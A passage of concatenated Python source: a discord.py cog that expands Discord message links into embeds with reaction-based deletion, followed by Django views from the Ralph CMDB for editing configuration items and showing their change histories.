regex_discord_message_url = ( '(?!<)https://(ptb.|canary.)?discord(app)?.com/channels/' '(?P<guild>[0-9]{18})/(?P<channel>[0-9]{18})/(?P<message>[0-9]{18})(?!>)' ) regex_extra_url = ( r'\?base_aid=(?P<base_author_id>[0-9]{18})' '&aid=(?P<author_id>[0-9]{18})' '&extra=(?P<extra_messages>(|[0-9,]+))' ) DELETE_REACTION_EMOJI = os.environ.get("DELETE_REACTION_EMOJI", "\U0001f5d1") class ExpandDiscordMessageUrl(commands.Cog): def __init__(self, bot): self.bot = bot @commands.Cog.listener() async def on_message(self, message): if message.author.bot: return await dispand(message) @commands.Cog.listener() async def on_raw_reaction_add(self, payload: discord.RawReactionActionEvent): await delete_dispand(self.bot, payload=payload) async def delete_dispand(bot: discord.Client, *, payload: Optional[discord.RawReactionActionEvent] = None, reaction: Optional[discord.Reaction] = None, user: Optional[discord.User] = None): if payload is not None: # when on_raw_reaction_add event if str(payload.emoji) != DELETE_REACTION_EMOJI: return if payload.user_id == bot.user.id: return channel = bot.get_channel(payload.channel_id) message = await channel.fetch_message(payload.message_id) await _delete_dispand(bot, message, payload.user_id) elif reaction is not None: # when on_reaction_add event if str(reaction.emoji) != DELETE_REACTION_EMOJI: return if user.id == bot.user.id: return await _delete_dispand(bot, reaction.message, user.id) else: raise ValueError("payload or reaction must be setted") async def _delete_dispand(bot: discord.Client, message: discord.Message, operator_id: int): if message.author.id != bot.user.id: return elif not message.embeds: return embed = message.embeds[0] if getattr(embed.author, "url", None) is None: return data = from_jump_url(embed.author.url) if not (data["base_author_id"] == operator_id or data["author_id"] == operator_id): return await message.delete() for message_id in data["extra_messages"]: extra_message = await message.channel.fetch_message(message_id) if extra_message is not None: await extra_message.delete() async def dispand(message): messages = await extract_message(message) for m in messages: sent_messages = [] if m.content or m.attachments: sent_message = await message.channel.send(embed=compose_embed(m)) sent_messages.append(sent_message) # Send the second and subsequent attachments with embed (named 'embed') respectively: for attachment in m.attachments[1:]: embed = Embed() embed.set_image( url=attachment.proxy_url ) sent_attachment_message = await message.channel.send(embed=embed) sent_messages.append(sent_attachment_message) for embed in m.embeds: sent_embed_message = await message.channel.send(embed=embed) sent_messages.append(sent_embed_message) # 一番先頭のメッセージにゴミ箱のリアクションをつける main_message = sent_messages.pop(0) await main_message.add_reaction(DELETE_REACTION_EMOJI) main_embed = main_message.embeds[0] main_embed.set_author( name=getattr(main_embed.author, "name", EmptyEmbed), icon_url=getattr(main_embed.author, "icon_url", EmptyEmbed), url=make_jump_url(message, m, sent_messages) ) await main_message.edit(embed=main_embed) async def extract_message(message): messages = [] for ids in re.finditer(regex_discord_message_url, message.content): if message.guild.id != int(ids['guild']): continue fetched_message = await fetch_message_from_id( guild=message.guild, channel_id=int(ids['channel']), message_id=int(ids['message']), ) messages.append(fetched_message) return messages async def fetch_message_from_id(guild, channel_id, message_id): channel = guild.get_channel(channel_id) message = await channel.fetch_message(message_id) return message def make_jump_url(base_message, dispand_message, extra_messages): """ make jump url which include more information :param base_message: メッセージリンクが貼られていたメッセージ :param dispand_message: 展開中のメッセージ :param extra_messages: 展開する際にでた二つ目以降のメッセージ(e.g. 画像やembed) :return: 混入が完了したメッセージリンク """ # base_aid: メッセージリンクで飛べる最初のメッセージの送信者のid # aid: メッセージリンクを送信したユーザーのid return "{0.jump_url}?base_aid={1.id}&aid={2.id}&extra={3}".format( dispand_message, dispand_message.author, base_message.author, ",".join([str(i.id) for i in extra_messages]) ) def from_jump_url(url): """ メッセージリンクから情報を取得します。 :param url: メッセージリンク :return: dict """ base_url_match = re.match(regex_discord_message_url + regex_extra_url, url) data = base_url_match.groupdict() return { "base_author_id": int(data["base_author_id"]), "author_id": int(data["author_id"]), "extra_messages": [int(_id) for _id in data["extra_messages"].split(",")] if data["extra_messages"] else [] } def compose_embed(message): embed = Embed( description=message.content, timestamp=message.created_at, color=discord.Colour.red() ) embed.set_author( name=message.author.display_name, icon_url=message.author.avatar_url, url=message.jump_url ) embed.set_footer( text=message.channel.name, icon_url=message.guild.icon_url, ) if message.attachments and message.attachments[0].proxy_url: embed.set_image( url=message.attachments[0].proxy_url ) return embed def setup(bot): bot.add_cog(ExpandDiscordMessageUrl(bot)) <reponame>jjagodzinski/ralph<gh_stars>0 #!/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import datetime import re from urlparse import urljoin from bob.data_table import DataTableMixin from bob.menu import MenuItem, MenuHeader from django.db.models import Q from django.contrib.auth.models import User from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage from django.shortcuts import get_object_or_404 from django.contrib import messages from django.http import HttpResponseRedirect from django.http import HttpResponseForbidden from django.http import HttpResponse from django.utils.translation import ugettext_lazy as _ from django.utils.safestring import mark_safe from django.utils import simplejson from django.utils.html import escape from django.conf import settings from lck.cache.memoization import memoize from lck.django.common import nested_commit_on_success from lck.django.filters import slugify from ralph.account.models import Perm, ralph_permission from ralph.cmdb.forms import ( CISearchForm, CIEditForm, CIViewForm, CIRelationEditForm, SearchImpactForm, ) from ralph.cmdb.models_ci import CILayer, CI_TYPES, CI, CIRelation, CIType import ralph.cmdb.models as db from ralph.cmdb.graphs import ImpactCalculator from ralph.ui.views.common import Base from ralph.util.presentation import ( get_device_icon, get_venture_icon, get_network_icon, ) from ralph.cmdb.forms import ( ReportFilters, ReportFiltersDateRange, ) from ralph.cmdb.util import report_filters, add_filter, table_colums JIRA_URL = urljoin(settings.ISSUETRACKERS['default']['URL'], 'browse') ROWS_PER_PAGE = 20 SAVE_PRIORITY = 200 def get_icon_for(ci): if not ci or not ci.content_type: return '' ctname = ci.content_type.name if ctname == 'venture': return get_venture_icon(ci.content_object) elif ctname == 'device': return get_device_icon(ci.content_object) elif ctname == 'network': return get_network_icon(ci.content_object) else: return 'wall' class BaseCMDBView(Base): template_name = 'nope.html' Form = CIRelationEditForm def generate_breadcrumb(self): parent = self.request.GET.get('parent', '') if not parent: return [] list = [] counter = 0 while parent and counter < 100: ci = db.CI.objects.filter(id=parent).all()[0] list.insert(0, ci) try: parent = db.CI.objects.filter(parent__child=parent).all()[0].id except: parent = None if parent == ci.id: parent = None counter += 1 return list @memoize(skip_first=True, update_interval=60) def get_permissions_dict(self, user_id): has_perm = User.objects.get(pk=user_id).get_profile().has_perm ci_perms = [ 'create_configuration_item', 'edit_configuration_item_info_generic', 'edit_configuration_item_relations', 'read_configuration_item_info_generic', 'read_configuration_item_info_puppet', 'read_configuration_item_info_git', 'read_configuration_item_info_jira', ] ret = {} for perm in ci_perms: ret.update({perm + '_perm': has_perm(getattr(Perm, perm))}) return ret def _get_sidebar_layers_items(self): return [ ( '/cmdb/search?layer=%d' % layer.id, layer.name, layer.icon.raw if layer.icon else 'fugue-layers-stack-arrange', ) for layer in CILayer.objects.order_by('name') ] def get_sidebar_items(self): ci = ( ('/cmdb/add', 'Add CI', 'fugue-block--plus'), ('/cmdb/changes/dashboard', 'Dashboard', 'fugue-dashboard'), ('/cmdb/graphs', 'Impact report', 'fugue-dashboard'), ('/cmdb/changes/timeline', 'Timeline View', 'fugue-dashboard'), ('/admin/cmdb', 'Admin', 'fugue-toolbox'), ('/cmdb/cleanup', 'Clean up', 'fugue-broom'), ) layers = ( ('/cmdb/search', 'All Cis (all layers)', 'fugue-magnifier'), ) layers += tuple(self._get_sidebar_layers_items()) reports = ( ('/cmdb/changes/reports?kind=top_changes', 'Top CI changes', 'fugue-reports'), ('/cmdb/changes/reports?kind=top_problems', 'Top CI problems', 'fugue-reports'), ('/cmdb/changes/reports?kind=top_incidents', 'Top CI incidents', 'fugue-reports'), ('/cmdb/changes/reports?kind=usage', 'Cis w/o changes', 'fugue-reports'), ) events = ( ('/cmdb/changes/changes', 'All Events', 'fugue-arrow'), ('/cmdb/changes/changes?type=3', 'Asset attr. changes', 'fugue-wooden-box--arrow'), ('/cmdb/changes/changes?type=4', 'Monitoring events', 'fugue-thermometer'), ('/cmdb/changes/changes?type=1', 'Repo changes', 'fugue-git'), ('/cmdb/changes/changes?type=2', 'Agent events', 'fugue-flask'), ('/cmdb/changes/incidents', 'Incidents', 'fugue-question'), ('/cmdb/changes/problems', 'Problems', 'fugue-bomb'), ('/cmdb/changes/jira_changes', 'Jira Changes', 'fugue-arrow-retweet'), ) sidebar_items = ( [MenuHeader('Configuration Items')] + [MenuItem( label=t[1], fugue_icon=t[2], href=t[0] ) for t in ci] + [MenuHeader('CI by Layers')] + [MenuItem( label=t[1], fugue_icon=t[2], href=t[0] ) for t in layers] + [MenuHeader('Reports')] + [MenuItem( label=t[1], fugue_icon=t[2], href=t[0] ) for t in reports] + [MenuHeader('Events and Changes')] + [MenuItem( label=t[1], fugue_icon=t[2], href=t[0] ) for t in events] + [MenuHeader('Other')] + [MenuItem( label='Archive', fugue_icon='fugue-vise-drawer', href='/cmdb/archive/assets/', )] ) return sidebar_items def get_context_data(self, *args, **kwargs): ret = super(BaseCMDBView, self).get_context_data(**kwargs) ret.update(self.get_permissions_dict(self.request.user.id)) ret.update({ 'sidebar_items': self.get_sidebar_items(), 'breadcrumbs': self.generate_breadcrumb(), 'url_query': self.request.GET, 'span_number': '6', 'ZABBIX_URL': settings.ZABBIX_URL, 'SO_URL': settings.SO_URL, 'tabs_left': False, 'fisheye_url': settings.FISHEYE_URL, 'fisheye_project': settings.FISHEYE_PROJECT_NAME, 'section': 'cmdb', }) return ret def _get_pages(paginator, page): pages = paginator.page_range[ max(0, page - 4):min(paginator.num_pages, page + 3) ] if 1 not in pages: pages.insert(0, 1) pages.insert(1, '...') if paginator.num_pages not in pages: pages.append('...') pages.append(paginator.num_pages) return pages def get_error_title(form): return ', '.join( form.errors.get('__all__', []), ) or 'Correct the errors.' if form.errors else '' class EditRelation(BaseCMDBView): template_name = 'cmdb/edit_relation.html' Form = CIRelationEditForm form_options = dict( label_suffix='', prefix='base', ) def get_context_data(self, **kwargs): ret = super(EditRelation, self).get_context_data(**kwargs) ret.update({ 'form': self.form, }) return ret def get(self, *args, **kwargs): if not self.get_permissions_dict(self.request.user.id).get( 'edit_configuration_item_relations_perm', False): return HttpResponseForbidden() rel_id = kwargs.get('relation_id') rel = get_object_or_404(db.CIRelation, id=rel_id) self.form_options['instance'] = rel self.form = self.Form(**self.form_options) self.rel_parent = rel.parent self.rel_child = rel.child self.rel_type = rel.type self.rel = rel return super(EditRelation, self).get(*args, **kwargs) @nested_commit_on_success def post(self, *args, **kwargs): self.form = None self.rel = None rel_id = kwargs.get('relation_id') rel = get_object_or_404(db.CIRelation, id=rel_id) self.form_options['instance'] = rel ci_id = kwargs.get('ci_id') if ci_id: # remove relation ci_relation = db.CIRelation.objects.filter(id=rel_id).all() ci_relation.delete() return HttpResponse('ok') if self.Form: self.form = self.Form(self.request.POST, **self.form_options) if self.form.is_valid(): ci_id = self.kwargs.get('ci_id') model = self.form.save(commit=False) model.save(user=self.request.user) return HttpResponseRedirect('/cmdb/edit/%s' % ci_id) else: error_title = get_error_title(self.form) messages.error(self.request, _(error_title)) return super(EditRelation, self).get(*args, **kwargs) class AddRelation(BaseCMDBView): template_name = 'cmdb/add_relation.html' Form = CIRelationEditForm form_options = dict( label_suffix='', prefix='base', ) def get_context_data(self, **kwargs): ret = super(AddRelation, self).get_context_data(**kwargs) ret.update({ 'form': self.form, 'relations_parent': self.relations_parent, 'relations_child': self.relations_child, }) return ret def form_initial(self): data = { 'parent': self.rel_parent, 'child': self.rel_child, } return data def get(self, *args, **kwargs): if not self.get_permissions_dict(self.request.user.id).get( 'edit_configuration_item_relations_perm', False): return HttpResponseForbidden() self.rel_parent = self.request.GET.get('rel_parent') self.rel_child = self.request.GET.get('rel_child') ci_id = kwargs.get('ci_id') self.ci = get_object_or_404(db.CI, id=ci_id) self.relations_parent = [ x.child for x in db.CIRelation.objects.filter(parent=ci_id) ] self.relations_child = [ x.parent for x in db.CIRelation.objects.filter(child=ci_id) ] self.form_options['initial'] = self.form_initial() self.form = self.Form(**self.form_options) return super(AddRelation, self).get(*args, **kwargs) @nested_commit_on_success def post(self, *args, **kwargs): self.form = None self.rel = None ci_id = kwargs.get('ci_id') self.ci = get_object_or_404(db.CI, id=ci_id) self.relations_parent = db.CIRelation.objects.filter( parent=ci_id, ) self.relations_child = db.CIRelation.objects.filter( child=ci_id, ) if self.Form: self.form = self.Form(self.request.POST, **self.form_options) if self.form.is_valid(): ci_id = self.kwargs.get('ci_id') model = self.form.save(commit=False) model.save(user=self.request.user) return HttpResponseRedirect('/cmdb/ci/edit/%s' % ci_id) else: error_title = get_error_title(self.form) messages.error(self.request, _(error_title)) return super(AddRelation, self).get(*args, **kwargs) class Add(BaseCMDBView): template_name = 'cmdb/add_ci.html' Form = CIEditForm form_options = dict( label_suffix='', prefix='base', ) def get_context_data(self, **kwargs): ret = super(Add, self).get_context_data(**kwargs) ret.update({ 'form': self.form, 'label': 'Add CI', 'subsection': 'Add CI', 'sidebar_selected': 'add ci', }) return ret def get(self, *args, **kwargs): self.form = self.Form(**self.form_options) return super(Add, self).get(*args, **kwargs) @nested_commit_on_success def post(self, *args, **kwargs): self.form = None self.ci = None if self.Form: self.form = self.Form(self.request.POST, **self.form_options) if self.form.is_valid(): model = self.form.save() if not model.content_object: model.uid = "%s-%s" % ('mm', model.id) model.save(user=self.request.user) messages.success(self.request, _("Changes saved.")) return HttpResponseRedirect( '/cmdb/ci/edit/' + unicode(model.id), ) else: messages.error(self.request, _("Correct the errors.")) return super(Add, self).get(*args, **kwargs) class LastChanges(BaseCMDBView): template_name = 'cmdb/search_changes.html' def get_context_data(self, **kwargs): ret = super(LastChanges, self).get_context_data(**kwargs) ret.update({ 'last_changes': self.last_changes, 'jira_url': JIRA_URL, }) return ret def get_last_changes(self, ci): from ralph.cmdb.integration.jira import Jira params = dict(jql='DB\\ CI="%s"' % self.ci_uid) xxx = Jira().find_issues(params) items_list = [] for i in xxx.get('issues'): f = i.get('fields') items_list.append(dict( key=i.get('key'), description=f.get('description'), summary=f.get('summary'), assignee=f.get('assignee').get('displayName'))), return items_list def get(self, *args, **kwargs): self.ci_uid = kwargs.get('ci_id', None) self.last_changes = self.get_last_changes(self.ci_uid) return super(LastChanges, self).get(*args, **kwargs) class BaseCIDetails(BaseCMDBView): template_name = 'cmdb/ci_details.html' def check_perm(self): if not self.get_permissions_dict(self.request.user.id).get( 'read_configuration_item_info_generic_perm', False, ): return HttpResponseForbidden() def get_tabs(self): tabs = [ ('Basic Info', 'main'), ('Relations', 'relations'), ] if self.get_permissions_dict(self.request.user.id).get( 'read_configuration_item_info_git_perm', False ): tabs.append(('Repo changes', 'git')) if self.get_permissions_dict(self.request.user.id).get( 'read_configuration_item_info_puppet_perm', False ): tabs.append(('Agent events', 'puppet')) if self.get_permissions_dict(self.request.user.id).get( 'read_configuration_item_info_jira_perm', False ): tabs.append(('Asset attr. changes', 'ralph')) if self.get_permissions_dict(self.request.user.id).get( 'read_configuration_item_info_jira_perm', False ): tabs.append(('CI attr. changes', 'ci_changes')) if self.get_permissions_dict(self.request.user.id).get( 'read_configuration_item_info_jira_perm', False ): tabs.append(('Monitoring events', 'zabbix')) if self.get_permissions_dict(self.request.user.id).get( 'read_configuration_item_info_jira_perm', False ): tabs.append(('Problems', 'problems')) if self.get_permissions_dict(self.request.user.id).get( 'read_configuration_item_info_jira_perm', False ): tabs.append(('Incidents', 'incidents')) if self.get_permissions_dict(self.request.user.id).get( 'read_configuration_item_info_jira_perm', False ): tabs.append(('Jira Changes', 'jira_changes')) return tabs def generate_breadcrumb(self): if getattr(self, 'ci'): parent_id = self.ci.id else: return [] breadcrumbs = [] counter = 0 while parent_id and counter < 100: try: ci = db.CI.objects.filter(id=parent_id).all()[0] except IndexError: break breadcrumbs.insert(0, ci) try: parent_id = db.CI.objects.filter( parent__child=parent_id ).all()[0].id except IndexError: parent_id = None if parent_id == ci.id: parent_id = None counter += 1 return breadcrumbs def get_messages(self): days = datetime.timedelta(days=7) last_week_puppet_errors = db.CIChangePuppet.objects.filter( ci=self.ci, time__range=( datetime.datetime.now(), datetime.datetime.now() - days) ).count() incidents = db.CIIncident.objects.filter( ci=self.ci, ).count() problems = db.CIProblem.objects.filter( ci=self.ci, ).count() messages = [] if last_week_puppet_errors: messages.append(dict( message="Puppet reported %d errors since last week." % ( last_week_puppet_errors), title='Warning', type='warning', )) if incidents: messages.append(dict( message="This CI has %d incidents." % (incidents), title='Be carefull.', type='error', )) if problems: messages.append(dict( message="This CI has %d problems." % (problems), title='Be carefull.', type='error', )) return messages def get_ci_id(self): # 2 types of id can land here ci_id = self.kwargs.get('ci_id') if ci_id.find('-') >= 0: ci = db.CI.objects.get(uid=ci_id) return ci.id else: return self.kwargs.get('ci_id', None) def initialize_vars(self): self.tabs = self.get_tabs() path = self.request.path if self.request.path.endswith('/'): path = self.request.path else: path = '%s/' % self.request.path if not re.search(r'[0-9]+/$', path): path = '%s../' % path self.base_ci_link = path def get_context_data(self, **kwargs): ret = super(BaseCIDetails, self).get_context_data(**kwargs) ret.update({ 'tabs': self.tabs, 'active_tab': self.active_tab, 'base_ci_link': self.base_ci_link, 'label': 'Edit CI: {} (uid: {})'.format(self.ci.name, self.ci.uid), 'subsection': 'Edit - %s' % self.ci.name, 'ci': self.ci, 'ci_id': self.ci.id, 'uid': self.ci.uid, 'cmdb_messages': self.get_messages(), }) return ret def _update_labels(items, ci): items.update({ 'label': 'View CI: {} (uid: {})'.format(ci.name, ci.uid), 'subsection': 'Info - %s' % ci.name, }) return items class MainCIEdit(BaseCIDetails): template_name = 'cmdb/ci_edit.html' active_tab = 'main' Form = CIEditForm form_options = dict(label_suffix='', prefix='base') def initialize_vars(self): super(MainCIEdit, self).initialize_vars() self.show_in_ralph = False self.ralph_ci_link = '' def get_context_data(self, **kwargs): ret = super(MainCIEdit, self).get_context_data(**kwargs) ret.update({ 'show_in_ralph': self.show_in_ralph, 'ralph_ci_link': self.ralph_ci_link, 'service_name': getattr(self, 'service_name', None), 'editable': True, 'form': self.form, }) return ret def get(self, *args, **kwargs): perm = self.check_perm() if perm: return perm self.initialize_vars() try: ci_id = self.get_ci_id() except db.CI.DoesNotExist: # CI doesn's exists. return HttpResponseRedirect('/cmdb/ci/jira_ci_unknown') if ci_id: self.ci = get_object_or_404(db.CI, id=ci_id) if ( self.ci.content_object and self.ci.content_type.name == 'device' ): self.show_in_ralph = True self.ralph_ci_link = "/ui/search/info/%d" % ( self.ci.content_object.id ) self.service_name = self.get_first_parent_venture_name(ci_id) self.form_options['instance'] = self.ci # self.form_options['initial'] = self.form_initial(self.ci) self.form = self.Form(**self.form_options) return super(MainCIEdit, self).get(*args, **kwargs) @nested_commit_on_success def post(self, *args, **kwargs): self.initialize_vars() ci_id = self.kwargs.get('ci_id') if ci_id: self.ci = get_object_or_404(db.CI, id=ci_id) self.form_options['instance'] = self.ci self.form = self.Form( self.request.POST, **self.form_options ) if self.form.is_valid(): model = self.form.save(commit=False) model.id = self.ci.id model.save(user=self.request.user) messages.success(self.request, "Changes saved.") return HttpResponseRedirect(self.request.path) else: messages.error(self.request, "Correct the errors.") return super(MainCIEdit, self).get(*args, **kwargs) def get_first_parent_venture_name(self, ci_id): cis = db.CI.objects.filter( relations__parent__child=ci_id, relations__parent__parent__type=db.CI_TYPES.VENTUREROLE.id, ).all() if cis: return cis[0].name class MainCIView(MainCIEdit): Form = CIViewForm def get_context_data(self, **kwargs): ret = super(MainCIView, self).get_context_data(**kwargs) ret = _update_labels(ret, self.ci) ret.update({ 'editable': False, }) return ret def post(self, *args, **kwargs): return HttpResponseForbidden() class CIRelationsEdit(BaseCIDetails): template_name = 'cmdb/ci_relations.html' active_tab = 'relations' def get_context_data(self, **kwargs): ret = super(CIRelationsEdit, self).get_context_data(**kwargs) ret.update({ 'relations_contains': self.relations_contains, 'relations_requires': self.relations_requires, 'relations_isrequired': self.relations_isrequired, 'relations_parts': self.relations_parts, 'relations_hasrole': self.relations_hasrole, 'relations_isrole': self.relations_isrole, 'editable': True, }) return ret def initialize_vars(self): super(CIRelationsEdit, self).initialize_vars() self.relations_contains = [] self.relations_parts = [] self.relations_requires = [] self.relations_isrequired = [] self.relations_hasrole = [] self.relations_isrole = [] def get(self, *args, **kwargs): perm = self.check_perm() if perm: return perm self.initialize_vars() try: ci_id = self.get_ci_id() except db.CI.DoesNotExist: # CI doesn's exists. return HttpResponseRedirect('/cmdb/ci/jira_ci_unknown') if ci_id: self.ci = get_object_or_404(db.CI, id=ci_id) self.calculate_relations(ci_id) return super(CIRelationsEdit, self).get(*args, **kwargs) def calculate_relations(self, ci_id): self.relations_contains = [ (x, x.child, get_icon_for(x.child)) for x in db.CIRelation.objects.filter( parent=ci_id, type=db.CI_RELATION_TYPES.CONTAINS.id) ] self.relations_parts = [ (x, x.parent, get_icon_for(x.parent)) for x in db.CIRelation.objects.filter( child=ci_id, type=db.CI_RELATION_TYPES.CONTAINS.id) ] self.relations_requires = [ (x, x.child, get_icon_for(x.parent)) for x in db.CIRelation.objects.filter( parent=ci_id, type=db.CI_RELATION_TYPES.REQUIRES.id) ] self.relations_isrequired = [ (x, x.parent, get_icon_for(x.parent)) for x in db.CIRelation.objects.filter( child=ci_id, type=db.CI_RELATION_TYPES.REQUIRES.id) ] self.relations_hasrole = [ (x, x.child, get_icon_for(x.parent)) for x in db.CIRelation.objects.filter( parent=ci_id, type=db.CI_RELATION_TYPES.HASROLE.id) ] self.relations_isrole = [ (x, x.parent, get_icon_for(x.parent)) for x in db.CIRelation.objects.filter( child=ci_id, type=db.CI_RELATION_TYPES.HASROLE.id) ] class CIRelationsView(CIRelationsEdit): def get_context_data(self, **kwargs): ret = super(CIRelationsView, self).get_context_data(**kwargs) ret = _update_labels(ret, self.ci) ret.update({ 'editable': False, }) return ret class CIGitEdit(BaseCIDetails): template_name = 'cmdb/ci_git.html' active_tab = 'git' def check_perm(self): if not self.get_permissions_dict(self.request.user.id).get( 'read_configuration_item_info_git_perm', False, ): return HttpResponseForbidden() def initialize_vars(self): super(CIGitEdit, self).initialize_vars() self.git_changes = [] def get_context_data(self, **kwargs): ret = super(CIGitEdit, self).get_context_data(**kwargs) ret.update({ 'label': 'Edit CI: {} (uid: {})'.format(self.ci.name, self.ci.uid), 'subsection': 'Edit - %s' % self.ci.name, 'git_changes': self.git_changes, }) return ret def get(self, *args, **kwargs): perm = self.check_perm() if perm: return perm self.initialize_vars() try: ci_id = self.get_ci_id() except db.CI.DoesNotExist: # CI doesn's exists. return HttpResponseRedirect('/cmdb/ci/jira_ci_unknown') if ci_id: self.ci = get_object_or_404(db.CI, id=ci_id) try: page = int(self.request.GET.get('page', 1)) except ValueError: page = 1 query = db.CIChange.objects.filter( ci=self.ci, type=db.CI_CHANGE_TYPES.CONF_GIT.id, ) paginator = Paginator(query, 20) self.git_changes = paginator.page(page) object_list = [] for item in self.git_changes.object_list: object_list.append(item.content_object) self.git_changes.object_list = object_list return super(CIGitEdit, self).get(*args, **kwargs) class CIGitView(CIGitEdit): def get_context_data(self, **kwargs): ret = super(CIGitView, self).get_context_data(**kwargs) return _update_labels(ret, self.ci) class CIPuppetEdit(BaseCIDetails): template_name = 'cmdb/ci_puppet.html' active_tab = 'puppet' def check_perm(self): if not self.get_permissions_dict(self.request.user.id).get( 'read_configuration_item_info_puppet_perm', False, ): return HttpResponseForbidden() def initialize_vars(self): super(CIPuppetEdit, self).initialize_vars() self.puppet_reports = [] def get_context_data(self, **kwargs): ret = super(CIPuppetEdit, self).get_context_data(**kwargs) ret.update({ 'puppet_reports': self.puppet_reports, }) return ret def get(self, *args, **kwargs): perm = self.check_perm() if perm: return perm self.initialize_vars() try: ci_id = self.get_ci_id() except db.CI.DoesNotExist: # CI doesn's exists. return HttpResponseRedirect('/cmdb/ci/jira_ci_unknown') if ci_id: self.ci = get_object_or_404(db.CI, id=ci_id) try: page = int(self.request.GET.get('page', 1)) except ValueError: page = 1 query = db.CIChangePuppet.objects.filter(ci=self.ci).all() paginator = Paginator(query, 10) self.puppet_reports = paginator.page(page) object_list = [] for report in self.puppet_reports.object_list: puppet_logs = db.PuppetLog.objects.filter( cichange=report ).all() object_list.append( dict(report=report, logs=puppet_logs) ) self.puppet_reports.object_list = object_list return super(CIPuppetEdit, self).get(*args, **kwargs) class CIPuppetView(CIPuppetEdit): def get_context_data(self, **kwargs): ret = super(CIPuppetView, self).get_context_data(**kwargs) return _update_labels(ret, self.ci) class CIRalphEdit(BaseCIDetails): template_name = 'cmdb/ci_ralph.html' active_tab = 'ralph' def check_perm(self): if not self.get_permissions_dict(self.request.user.id).get( 'read_configuration_item_info_jira_perm', False, ): return HttpResponseForbidden() def initialize_vars(self): super(CIRalphEdit, self).initialize_vars() self.device_attributes_changes = [] def get_context_data(self, **kwargs): ret = super(CIRalphEdit, self).get_context_data(**kwargs) ret.update({ 'device_attributes_changes': self.device_attributes_changes, }) return ret def get(self, *args, **kwargs): perm = self.check_perm() if perm: return perm self.initialize_vars() try: ci_id = self.get_ci_id() except db.CI.DoesNotExist: # CI doesn's exists. return HttpResponseRedirect('/cmdb/ci/jira_ci_unknown') if ci_id: self.ci = get_object_or_404(db.CI, id=ci_id) try: page = int(self.request.GET.get('page', 1)) except ValueError: page = 1 query = db.CIChange.objects.filter( ci=self.ci, type=db.CI_CHANGE_TYPES.DEVICE.id, ) paginator = Paginator(query, 20) self.device_attributes_changes = paginator.page(page) object_list = [] for item in self.device_attributes_changes.object_list: object_list.append(item.content_object) self.device_attributes_changes.object_list = object_list return super(CIRalphEdit, self).get(*args, **kwargs) class CIRalphView(CIRalphEdit): def get_context_data(self, **kwargs): ret = super(CIRalphView, self).get_context_data(**kwargs) return _update_labels(ret, self.ci) class CIChangesEdit(BaseCIDetails): template_name = 'cmdb/ci_changes.html' active_tab = 'ci_changes' def check_perm(self): if not self.get_permissions_dict(self.request.user.id).get( 'read_configuration_item_info_jira_perm', False, ): return HttpResponseForbidden() def initialize_vars(self): super(CIChangesEdit, self).initialize_vars() self.ci_attributes_changes = [] def get_context_data(self, **kwargs): ret = super(CIChangesEdit, self).get_context_data(**kwargs) ret.update({ 'ci_attributes_changes': self.ci_attributes_changes, }) return ret def get(self, *args, **kwargs): perm = self.check_perm() if perm: return perm self.initialize_vars() try: ci_id = self.get_ci_id() except db.CI.DoesNotExist: # CI doesn's exists. return HttpResponseRedirect('/cmdb/ci/jira_ci_unknown') if ci_id: self.ci = get_object_or_404(db.CI, id=ci_id) try: page = int(self.request.GET.get('page', 1)) except ValueError: page = 1 query = db.CIChange.objects.filter( ci=self.ci, type=db.CI_CHANGE_TYPES.CI.id, ).order_by('time') paginator = Paginator(query, 20) self.ci_attributes_changes = paginator.page(page) object_list = [] for item in self.ci_attributes_changes.object_list: object_list.append(item.content_object) self.ci_attributes_changes.object_list = object_list return super(CIChangesEdit, self).get(*args, **kwargs) class CIChangesView(CIChangesEdit): def get_context_data(self, **kwargs): ret = super(CIChangesView, self).get_context_data(**kwargs) return _update_labels(ret, self.ci) class CIZabbixEdit(BaseCIDetails): template_name = 'cmdb/ci_zabbix.html' active_tab = 'zabbix' def check_perm(self): if not self.get_permissions_dict(self.request.user.id).get( 'read_configuration_item_info_jira_perm', False, ): return HttpResponseForbidden() def initialize_vars(self): super(CIZabbixEdit, self).initialize_vars() self.zabbix_triggers = [] def get_context_data(self, **kwargs): ret = super(CIZabbixEdit, self).get_context_data(**kwargs) ret.update({ 'zabbix_triggers': self.zabbix_triggers, }) return ret def get(self, *args, **kwargs): perm = self.check_perm() if perm: return perm self.initialize_vars() try: ci_id = self.get_ci_id() except db.CI.DoesNotExist: # CI doesn's exists. return HttpResponseRedirect('/cmdb/ci/jira_ci_unknown') if ci_id: self.ci = get_object_or_404(db.CI, id=ci_id) try: page = int(self.request.GET.get('page', 1)) except ValueError: page = 1 query = db.CIChangeZabbixTrigger.objects.filter( ci=self.ci, ).order_by('-lastchange') paginator = Paginator(query, 20) self.zabbix_triggers = paginator.page(page) return super(CIZabbixEdit, self).get(*args, **kwargs) class CIZabbixView(CIZabbixEdit): def get_context_data(self, **kwargs): ret = super(CIZabbixView, self).get_context_data(**kwargs) return _update_labels(ret, self.ci) class CIProblemsEdit(BaseCIDetails, DataTableMixin): template_name = 'cmdb/ci_changes_tab.html' active_tab = 'problems' sort_variable_name = 'sort' export_variable_name = None # fix in bob! columns = table_colums() perms = [ { 'perm': Perm.read_configuration_item_info_jira, 'msg': _("You don't have permission to see that."), }, ] def initialize_vars(self): super(CIProblemsEdit, self).initialize_vars() self.problems = [] def get_context_data(self, *args, **kwargs): ret = super(CIProblemsEdit, self).get_context_data(**kwargs) ret.update( super(CIProblemsEdit, self).get_context_data_paginator( *args, **kwargs ) ) ret.update({ 'sort_variable_name': self.sort_variable_name, 'url_query': self.request.GET, 'sort': self.sort, 'columns': self.columns, 'jira_url': JIRA_URL, 'form': { 'filters': ReportFilters(self.request.GET), 'date_range': ReportFiltersDateRange(self.request.GET), }, }) return ret @ralph_permission(perms) def get(self, *args, **kwargs): self.initialize_vars() try: ci_id = self.get_ci_id() except db.CI.DoesNotExist: return HttpResponseRedirect('/cmdb/ci/jira_ci_unknown') self.ci = get_object_or_404(db.CI, id=ci_id) self.data_table_query( report_filters( cls=db.CIProblem, order='-update_date', filters=add_filter(self.request.GET, ci=self.ci), ) ) return super(CIProblemsEdit, self).get(*args, **kwargs) class CIProblemsView(CIProblemsEdit): def get_context_data(self, **kwargs): ret = super(CIProblemsView, self).get_context_data(**kwargs) return _update_labels(ret, self.ci) class JiraChangesEdit(BaseCIDetails, DataTableMixin): template_name = 'cmdb/ci_changes_tab.html' active_tab = 'jira_changes' sort_variable_name = 'sort' export_variable_name = None # fix in bob! columns = table_colums() perms = 